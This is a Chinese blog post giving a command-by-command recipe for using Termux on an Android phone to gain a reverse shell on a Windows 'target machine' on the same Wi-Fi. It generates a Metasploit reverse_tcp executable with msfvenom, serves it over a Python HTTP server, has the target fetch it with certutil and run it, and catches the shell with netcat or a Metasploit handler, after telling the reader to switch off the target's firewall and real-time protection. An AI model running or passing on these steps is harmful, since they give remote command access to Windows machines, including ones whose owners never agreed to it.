Termux ↔ Windows 靶机 反向连接实操命令清单

石像鬼₧魂石2025-12-13 21:13

核心逻辑:和 Kali 操作一致,把手机(Termux)当成攻击机,让 Windows 靶机主动连接手机,全程无 Root 也能搞定!

前提准备

  1. 手机和 Windows 靶机必须连同一个 WiFi(确保在同一网段)

  2. 查看 Termux 的局域网 IP(记下来,后续替换手机IP

    bash

    运行

    复制代码 
    ifconfig wlan0  # 找 inet 后面的IP,比如 192.168.1.6

  3. 靶机提前关闭防火墙和实时保护(和之前操作一样)

阶段 1:Termux 环境配置 + 工具安装

bash

运行

复制代码 
# 1. 换国内源(解决下载慢)
sed -i 's@^\(deb.*stable main\)$@#\1\ndeb https://mirrors.tuna.tsinghua.edu.cn/termux/apt/termux-main stable main@' $PREFIX/etc/apt/sources.list
apt update && apt upgrade -y

# 2. 安装核心工具(nc + python3 + msfvenom)
apt install -y netcat-openbsd python3 metasploit  # metasploit包含msfvenom

阶段 2:方案 1 - 极简 NC 反向连接(优先验证,0 失败)

步骤 1:Termux 启动 NC 监听(等靶机连接)

bash

运行

复制代码 
# 监听1337端口(和之前Kali用的端口一致)
nc -lvp 1337

步骤 2:Termux 生成 NC 反向 Shell Payload

新开一个 Termux 终端,不要关监听的终端!

bash

运行

复制代码 
# 生成Windows反向Shell Payload,IP填手机的局域网IP
msfvenom -p windows/x64/shell/reverse_tcp LHOST=手机IP LPORT=1337 -f exe -o /data/data/com.termux/files/home/shell_termux.exe

步骤 3:Termux 启动 HTTP 服务器(给靶机传文件)

继续在新终端执行,把 Payload 放到手机目录方便靶机下载

bash

运行

复制代码 
# 授权访问手机存储(首次执行会弹权限,点允许)
termux-setup-storage

# 把Payload复制到手机下载目录
cp /data/data/com.termux/files/home/shell_termux.exe /sdcard/Download/

# 进入下载目录,启动HTTP服务器(端口9000)
cd /sdcard/Download
python3 -m http.server 9000

步骤 4:Windows 靶机 下载 + 执行 Payload

在靶机管理员 CMD 窗口执行

cmd

复制代码 
cd /d C:\Windows\Temp

# 下载Payload,地址填 手机IP:9000
certutil -urlcache -split -f http://手机IP:9000/shell_termux.exe shell_termux.exe

# 执行Payload
shell_termux.exe

验证成功

Termux 的 NC 监听终端会直接弹出靶机的 CMD 提示符,和之前 Kali 的效果一模一样!

阶段 3:方案 2 - Termux 用 MSF 拿会话(进阶功能)

步骤 1:Termux 启动 MSF 监听

新开 Termux 终端,执行

bash

运行

复制代码 
msfconsole -q

# 配置监听参数(和Payload一致)
use exploit/multi/handler
set PAYLOAD windows/x64/shell/reverse_tcp
set LHOST 手机IP
set LPORT 1337
set ExitOnSession false
run -j

步骤 2:靶机 重新执行 Payload

直接在靶机 CMD 窗口再次执行

cmd

复制代码 
C:\Windows\Temp\shell_termux.exe

验证成功

Termux 的 MSF 终端会弹出会话日志,执行sessions -l查看,sessions -i 1进入靶机 CMD。

避坑提醒(Termux 特有)

  1. 端口限制:无 Root 时不能绑定 1024 以下端口,所以用 1337/9000 这类高位端口
  2. 路径问题 :Termux 默认目录在/data/data/com.termux/files/home/,复制到/sdcard/才能被 HTTP 服务器访问
  3. 网络问题:必须确保手机和靶机在同一 WiFi,手机不能开热点(热点会切换网段)
  4. 工具安装失败 :如果 metasploit 装不上,先执行pkg install -y wget curl,再重新装
相关推荐
小成202303202654 小时前
Linux高级02
linux·开发语言
mounter6254 小时前
【硬核前沿】CXL 深度解析:重塑数据中心架构的“高速公路”,Linux 内核如何应对挑战?-- CXL 协议详解与 LSF/MM 最新动态
linux·服务器·网络·架构·kernel
++==4 小时前
Linux 进程间通信与线程同步技术详解:IPC 机制、线程 API、同步工具与经典同步问题
linux
泓铮4 小时前
Windows 环境下 WSL2 与 VMware Workstation 17 共存机制研究与工程实践
windows
特长腿特长5 小时前
centos、ubantu系列机的用户和用户组的结构是什么?具体怎么配置?用户组权限怎么使用?这篇文章持续更新,帮助你复习linux的基础知识
linux·运维·centos
zzzyyy5385 小时前
Linux环境变量
linux·运维·服务器
pluvium275 小时前
记对 xonsh shell 的使用, 脚本编写, 迁移及调优
linux·python·shell·xonsh
无级程序员5 小时前
centos7 安装 llvm-toolset-7-clang出错的问题解决
linux·centos
龙文浩_5 小时前
Attention Mechanism: From Theory to Code
人工智能·深度学习·神经网络·学习·自然语言处理
CHHC18806 小时前
NetCore树莓派桌面应用程序
linux·运维·服务器
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南07实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了08Oh My Codex 快速使用指南09开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案10AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析